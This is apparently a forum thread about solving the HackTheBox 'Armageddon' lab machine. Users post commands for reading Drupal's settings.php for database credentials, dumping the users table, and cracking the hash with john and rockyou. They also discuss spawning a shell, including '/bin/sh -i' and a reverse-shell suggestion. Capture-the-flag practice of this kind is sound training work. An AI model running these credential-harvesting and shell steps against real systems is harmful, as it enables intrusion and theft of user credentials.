cat /var/www/html/sites/default/settings.php

mysql -u drupaluser -h localhost -pCQ<snip>gBVj
use drupal;
select * from users;
bruce<snip>  $S$DgL2gjv6ZtxBo6CdqZEyJuBph<snip>

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
How can you spawn interactive shell? I tried python2 but not working

jut got the user pass, now stuck on snap install
(March 28, 2021 at 04:01 AM)justanobody Wrote: How can you spawn interactive shell? I tried python2 but not working

tried python 2 and 3. no success.
You dont need the full tty(python pty) shell. You can just read the table directly. If you dont get output see if your shell is still alive
(March 28, 2021 at 07:08 AM)fastbyte Wrote: You dont need the full tty(python pty) shell. You can just read the table directly. If you dont get output see if your shell is still alive
I'm not able to connect with mysql from this shell, any suggestion ? Nothing happens at the next line.
(March 28, 2021 at 04:01 AM)justanobody Wrote: How can you spawn interactive shell? I tried python2 but not working

Try reverse shell back on your device ;)  but onestly is not so important

/bin/sh -i

is possible :  )
(March 28, 2021 at 07:08 AM)fastbyte Wrote: You dont need the full tty(python pty) shell. You can just read the table directly. If you dont get output see if your shell is still alive

If it's not working, you can just append -e"use drupal; select * from users;" to your command and get it that way
awsome  !!!      Thanks !!!!!
Check my Armageddon writeup - https://htbctfwalkthrough . blogspot . com/2021/04/hackthebox-armageddon-walkthrough.html!
No passwords needed!

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Armageddon Writeup Jockerjock 4 2,783 April 28, 2021 at 11:27 AM
Last Post: Rash
FLAG Armageddon Detailed Writeup sakthi2852 2 1,545 April 28, 2021 at 11:26 AM
Last Post: Rash
SELLING HTB Atom - user.sh bash script to get user foothold chilly 3 791 April 18, 2021 at 12:29 PM
Last Post: chilly